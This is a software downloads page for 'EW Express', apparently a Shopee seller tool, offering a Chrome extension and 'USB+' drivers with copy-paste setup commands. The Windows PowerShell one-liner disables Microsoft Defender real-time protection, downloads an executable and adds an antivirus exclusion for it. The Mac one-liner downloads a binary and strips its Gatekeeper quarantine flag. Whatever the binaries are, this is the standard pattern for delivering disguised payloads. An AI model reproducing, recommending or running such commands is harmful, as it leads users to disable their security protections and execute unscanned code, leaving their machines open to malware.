EW Express EW Express
Features How it works Pricing ↓ Downloads

Downloads

Everything you need to get started with EW Express.

EW Tag Chrome Extension

Works directly inside Shopee Seller Centre. Install once and it's ready to go.

↓ Add to Chrome
🔌

Modem Driver

Required for the EW Tag modem to connect via USB on your computer.

↓ Download Driver
💾

USB+ Drivers

Drivers for USB+ connectivity on your computer.

Mac ↓ Mac (ARM64) ↓ Windows

 Mac Setup

Open Terminal and run:

rm -f ~/Downloads/usb-plus-mac-arm64 && curl -fSL -o ~/Downloads/usb-plus-mac-arm64 https://ew-express.com/download/driver/usb-plus/usb-plus-mac-arm64 && chmod +x ~/Downloads/usb-plus-mac-arm64 && xattr -d com.apple.quarantine ~/Downloads/usb-plus-mac-arm64 2>/dev/null || true

Then start the USB+:

~/Downloads/usb-plus-mac-arm64

Or simply double-click the usb-plus-mac-arm64 file to run it.

⊞ Windows Setup

Open PowerShell and run:

Remove-Item -Path \"$env:USERPROFILE\\Downloads\\usb-plus-win.exe\" -Force -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring $true; Invoke-WebRequest -Uri \"https://ew-express.com/download/driver/usb-plus/usb-plus-win.exe\" -OutFile \"$env:USERPROFILE\\Downloads\\usb-plus-win.exe\"; Add-MpPreference -ExclusionPath \"$env:USERPROFILE\\Downloads\\usb-plus-win.exe\"; Set-MpPreference -DisableRealtimeMonitoring $false;

Then start the USB+:

\"$env:USERPROFILE\\Downloads\\usb-plus-win.exe\"

Or simply double-click the usb-plus-win.exe file to run it.